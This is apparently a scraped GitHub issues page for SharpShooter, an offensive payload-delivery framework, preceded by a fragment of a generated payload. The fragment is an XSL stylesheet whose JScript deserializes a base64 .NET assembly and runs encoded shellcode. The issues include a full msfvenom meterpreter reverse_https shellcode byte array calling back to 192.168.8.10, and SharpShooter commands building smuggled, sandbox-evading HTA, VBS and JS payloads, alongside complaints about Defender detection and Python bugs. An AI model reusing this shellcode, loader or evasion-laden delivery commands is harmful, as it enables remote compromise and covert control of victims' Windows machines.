"GAUAAR0FDgIGGAQAARkLCAAEAR0FCBgICAABEoCZEYCdCQACEoChGBKAmQi3elxWGTTgiQQAEAAA"+
"BAAgAAAEAAAIAAQAAAAgBAAAQAAEAAAQAAQAACAABBAAAAAEIAAAAARAAAAABIAAAAAEAQAAAAQC"+
"AAAABAQAAAAECAAAAAQAAQAABAACAAAEAAQAAAQAQAAABACAAAACBgkDBhEQAwYRFAMGERgDIAAC"+
"CQAEGBgZERARFAkABhgYCRgYCRgHAAMCGAkRGAUgAgEIDgUgAgEcGAcgAhJdEmEcBSABCBJdCAEA"+
"CAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABkBABRTaGFycFNo"+
"b290ZXJBc3NlbWJseQAAIgEAHVNoYXJwU2hvb3RlciBQYXlsb2FkIERlbGl2ZXJ5AAAFAQAAAAAX"+
"AQASTURTZWMgQWN0aXZlQnJlYWNoAAAnAQAiQ29weXJpZ2h0IMKpIE1EU2VjIENvbnN1bHRpbmcg"+
"MjAxNwAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFmMzM3YWJlNTc3NwAADAEABzEuMC4w"+
"LjAAAAUBAAEAAAAAAAALZIRaAAAAAAIAAAAcAQAAHD4AABwgAABSU0RTCkrXhhukXku87fvh281l"+
"6QEAAABaOlxkbWNcQ29kZVxTaGFycFNob290ZXJcU2hhcnBTaG9vdGVyXENTaGFycFNob290ZXJT"+
"dGFnZWxlc3Ncb2JqXFJlbGVhc2VcU2hhcnBTaG9vdGVyQXNzZW1ibHkucGRiAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGA/AAAAAAAAAAAAAHo/AAAAIAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAABsPwAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxs"+
"AAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACA"+
"AAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAPgDAAAAAAAAAAAAAPgDNAAAAFYAUwBfAFYARQBS"+
"AFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQA"+
"AAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABU"+
"AHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsARYAwAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkA"+
"bgBmAG8AAAA0AwAAAQAwADAAMAAwADAANABiADAAAABUAB4AAQBDAG8AbQBtAGUAbgB0AHMAAABT"+
"AGgAYQByAHAAUwBoAG8AbwB0AGUAcgAgAFAAYQB5AGwAbwBhAGQAIABEAGUAbABpAHYAZQByAHkA"+
"AABGABMAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAE0ARABTAGUAYwAgAEEAYwB0AGkAdgBl"+
"AEIAcgBlAGEAYwBoAAAAAABSABUAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAA"+
"UwBoAGEAcgBwAFMAaABvAG8AdABlAHIAQQBzAHMAZQBtAGIAbAB5AAAAAAAwAAgAAQBGAGkAbABl"+
"AFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABSABkAAQBJAG4AdABlAHIAbgBhAGwA"+
"TgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAuAGQAbABs"+
"AAAAAABoACIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA"+
"dAAgAKkAIABNAEQAUwBlAGMAIABDAG8AbgBzAHUAbAB0AGkAbgBnACAAMgAwADEANwAAACoAAQAB"+
"AEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAWgAZAAEATwByAGkAZwBpAG4A"+
"YQBsAEYAaQBsAGUAbgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBi"+
"AGwAeQAuAGQAbABsAAAAAABKABUAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFMAaABhAHIA"+
"cABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABW"+
"AGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYA"+
"ZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAADAAAAwAAACMPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3Nl"+
"bWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'SharpShooter';

try {
	setversion();
	var shell = new ActiveXObject('WScript.Shell');
	shell.popup("test");
	var stm = base64ToStream(serialized_obj);
	shell.popup("test");
	var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
	var al = new ActiveXObject('System.Collections.ArrayList');
	shell.popup("test");
	var n = fmt.SurrogateSelector;
	var d = fmt.Deserialize_2(stm);
	al.Add(n);
	var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
	


	var sc = "/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6AAAAAAx/1dXV1dXaDpWeaf/1emkAAAAWzHJUVFqA1FRaLsBAABTUGhXiZ/G/9VQ6YwAAABbMdJSaAAyoIRSUlJTUlBo61UuO//VicaDw1BogDMAAIngagRQah9WaHVGnob/1V8x/1dXav9TVmgtBhh7/9WFwA+EygEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3UHWFDpe////zH/6ZEBAADpyQEAAOhv////LzlGeWQAjTqQubyTrYyq00mM5lJWY6KJ5WC6rmdKmJF/M2/lyLRY5vCvXhZn0bXFouzlRIdE/EI4Gzhf30LN3wWzF1iU8U7qLX0p+E+2zgBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNS4xOyBUcmlkZW50LzQuMDsgSW5mb1BhdGguMSkNCgCAUAL1lcmYG0pfGTbaWbCZr3ucqYLQWmN+0oHSvp85E0TSLU7ahODZ5/kxQdpYYuHiiOA8+cW7ScVxHzrQLkE+0pVMV9UN4ypz1pNg8FgwOnyybZVoy3mdtON7Ima6fNiznDGq+1PlQVQvxptyv4hrDWebe4fo5x03DABlhPC9zW1Fv5N/RHmbzlRnb47XZj/TNHaJamMzGFFGfoyUazQrUz5IT2xB/KZnkBeQkNE36nZ+opHjhWlv7WyB4X52OAe/0J7n6gnD6rkgvB9Yix9GR6arOLsAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk7kAAAAAAdlRU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0xosHAcOFwHXlWMPoif3//zE3Mi4xNi4xMzIuMQA6UNWZ";
	o.Go(sc);

} catch (e) {
    debug(e.message);
}
]]>
   return nodelist.nextNode().xml;
 
   }
</msxsl:script>
<xsl:template match="/">
   <xsl:value-of select="sharp:shooter(.)"/>
</xsl:template>
</xsl:stylesheet>

.net 4 payload generation issues

Payload generation for .net 4 results in a prompt on a default Windows 10 installation to install .net 3.5.

This is via command line and interactive methods.

I believe the confusion is in the code where 1=.net 2 and 2=.net 4 and a decision is made where 2 (meaning .net 4) takes .net 2 instead.

Result is .net 2 payloads are always generated.

Easily missed if testing from a Windows 10 system that has had older .net installed.

Not able get a meterpreter session back to Kali VM from Win10 client (Defender OFF)

Hello,

Not sure if my msfvenom statement is correct? Never received any errors. Also, not seeing any errors after running the "python SharpShooter.py..........." command. So, when my Win10 client downloads the hta payload and Opens it, there's no call back to Meterpreter. Am I missing something here?
Thanks, Chrisandjer949

root@kali:/SharpShooter/output# msfvenom --platform windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.8.10 LPORT=4444 EnableStageEncoding=True StageEncoder=x64/shikata_ga_nai -f csharp
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 694 bytes
Final size of csharp file: 3548 bytes
byte[] buf = new byte[694] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,
0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0d,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38,0x2e,
0x31,0x30,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0x5c,0x11,0x00,0x00,0x4d,
0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,0x00,
0x00,0x00,0xff,0xd5,0xe8,0x8e,0x00,0x00,0x00,0x2f,0x46,0x4f,0x58,0x6d,0x70,
0x50,0x32,0x74,0x66,0x53,0x70,0x71,0x48,0x32,0x73,0x64,0x4d,0x66,0x66,0x50,
0x35,0x67,0x43,0x42,0x76,0x48,0x4e,0x73,0x72,0x79,0x4f,0x43,0x37,0x59,0x34,
0x52,0x37,0x67,0x62,0x42,0x46,0x4b,0x36,0x79,0x61,0x34,0x4f,0x72,0x46,0x43,
0x65,0x42,0x62,0x6b,0x6a,0x68,0x74,0x73,0x79,0x34,0x63,0x76,0x39,0x4e,0x58,
0x70,0x64,0x38,0x4b,0x69,0x49,0x43,0x4e,0x36,0x48,0x42,0x76,0x32,0x38,0x66,
0x4f,0x49,0x42,0x74,0x75,0x42,0x48,0x35,0x48,0x53,0x57,0x46,0x30,0x4c,0x48,
0x52,0x4b,0x5a,0x75,0x75,0x4e,0x33,0x71,0x6d,0x39,0x75,0x38,0x73,0x4d,0x36,
0x50,0x56,0x52,0x61,0x52,0x5a,0x33,0x34,0x79,0x68,0x35,0x42,0x78,0x50,0x4d,
0x71,0x59,0x77,0x57,0x46,0x37,0x4e,0x75,0x49,0x70,0x37,0x2d,0x72,0x56,0x52,
0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,
0x32,0xa0,0x84,0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,
0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,
0x5a,0x52,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,
0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,
0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,
0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,
0x00,0x00,0x49,0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,
0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,
0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,
0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,
0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,
0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,
0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,
0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,
0xa2,0x56,0xff,0xd5 };
root@kali:/SharpShooter/output# cd ..

root@kali:~/SharpShooter# python SharpShooter.py --dotnetver 2 --payload hta --output hta --rawscfile ./raw.txt --web http://192.168.8.10/htadoc.hta --smuggle --template mcafee --deliver web --refs mscorlib.dll,System.Windows.Forms.dll --namespace CL2018.SharpShooter --entrypoint Main

   _____ __                    _____ __                __           
  / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
  \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
 ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
/____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                     /_/                                            

 Dominic Chell, @domchell, MDSec ActiveBreach, v1.0

[] Written delivery payload to output/hta.hta
[] File [./output/hta.hta] successfully loaded !
[] Encrypted input file with key [qzfcakkbfa]
[] File [./output/hta.html] successfully created !
root@kali:~/SharpShooter#

clean pull of the src does not appear to work with python 3 on stock kali

appears to have some compatibility issues with python 3 and 3.6. Running through the HTA payload generation causes a python error with Strings module.

Additionally when running a fresh pull with python 2.7 it will not accept a uri for the HTA payload.

I've forked the repo and have started trying to fix the bugs myself but wanted to make MDsec aware of the issues

Thanks for an amazing tool!

Windows Defender flagging out the dropped DLL

Hi, i tested out this framework recently but it didn't work that well for me.

In my scenario, i made use of the web delivery portion to deliver my javascript payload. When the javascript file was executed, it connects back to my attacking web server to get the shellcode (A http meterpreter payload). However that was where the problem arose. From the Windows Defender log, i could see the DLL (meterpreter stager) being dropped onto the AppData\Local\Temp folder, causing windows defender to flag it out as malicious. I'm not sure what's causing this as based on what i read from the readme, the stager should actually be loaded into memory?

[!] Missing --dotnetver argument

Hey!
I've already installed dotnet on my Kali Linux but still I can't start the SharpShooter.
When I run python SharpShooter.py It shows this error.

ekran resmi 2018-07-24 18 19 46

Encoding issue with Python3

Using Python3 causes an UTF-8 encoding error when generating the payload while Python2 works fine.
Example:

root@kali:~/tools/SharpShooter# python3 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc

       _____ __                    _____ __                __           
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                         /_/                                            

     Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
    
'utf-8' codec can't decode byte 0xda in position 0: invalid continuation byte

[!] Incorrect choice
root@kali:~/tools/SharpShooter# 
root@kali:~/tools/SharpShooter# python2 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc 

       _____ __                    _____ __                __           
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                         /_/                                            

     Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
    
[*] Written delivery payload to output/poc.hta
root@kali:~/tools/SharpShooter#

An app on your PC needs the following Windows feature

Did I miss something?

Create CobaltStrike (x32) payload like showed in the vimeo video


python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output vbstest --rawscfile /root/payload32.bin --sandbox 3,4,5

       _____ __                    _____ __                __
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/
                         /_/

     Dominic Chell, @domchell, MDSec ActiveBreach, v0.2

[*] Avoiding sandbox artifacts
[*] Avoiding bad MACs
[*] Avoiding debugging
[*] Written delivery payload to output/vbstest.vbs

Execute the VBS script Windows 7 (x64): Nothing
Execute the VBS script Windows 10 (x64): An app on your PC needs the following Windows feature

img

initial_value must be unicode or None, not str

Anyone facing this issue?

Command (e.g)
python2.7 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile shell.txt --output test

Traceback (most recent call last):
  File "SharpShooter.py", line 599, in <module>
    ss.run(args)
  File "SharpShooter.py", line 527, in run
    payload_minified = jsmin(payload)
  File "/usr/local/lib/python2.7/dist-packages/jsmin/__init__.py", line 40, in jsmin
    ins = klass(js)
TypeError: initial_value must be unicode or None, not str

Inconsitent use of tabs and spaces in modules/excel4.py

Problem: modules/excel4.py mixes spaces and tabs.
Version: lastest master
Python version 3.9.0
OS: ParrotOS

Running python3 SharpShooter.py results in:

Traceback (most recent call last):
  File "/mnt/hgfs/debian/SharpShooter/SharpShooter.py", line 21, in <module>
    from modules import *
  File "/mnt/hgfs/debian/SharpShooter/modules/excel4.py", line 39
    if i == 0:
TabError: inconsistent use of tabs and spaces in indentation

Format of raw shellcode from `msfvenom`

I'm trying to generate a shellcode for a stageless sharpshooter payload, and I can't seem to format the shellcode in a way that it likes.

If I use msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=<host> LPORT=80 Prependmigrate=true -f raw -o meter.out
then I get an error during the interactive payload creation like

[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter.out
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte

Okay, so I used the -f python and -f hex and the like, and it complains thus:

[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter_hex.out
a bytes-like object is required, not 'str'

So I can't seem to satisfy its requirement. What weird thing am I doing wrong here? Or is this a python2/3 deal?

python -V  
Python 3.6.4`

Missing license information

Hello,

I didn't find any mention of the license. Could you indicate under which license this license SharpShooter is published ? in the Readme or in a specific LICENSE file.

Thanks

.HTA file execution doesn't call back

Hi,

Currently I'm generating a RAW payload in Cobalt Strike for a windows/beacon/reverse_https listener. Output is a standard payload.bin file, which is then used as input to SharpShooter as follows:

SharpShooter.py --stageless --dotnetver 4 --payload hta --output test --rawscfile payload.bin

I've also tried the following variation:

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile payload.bin --smuggle --template mcafee

However every time I try to run the HTA file on Windows, the payload fails to call back. Windows Defender is disabled for all of this testing, and no other AV is present. Network monitoring with Wireshark confirms too that the payload is not calling out. I have tried modifying the harness.hta template to just take the payload.bin as input, without any base64 encoding or the rc4 encipherment to check if it works, however the payload still refuses to call out or even make a network connection attempt.

Am I being obtuse or can someone confirm these findings? I have tried with both Internet Explorer and of course Microsoft (R) HTML Application Host.

Request: Update for Python3

Would be cool if we could use Python3 instead of 2 for this. It doesn't even run for me with Python2 now.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.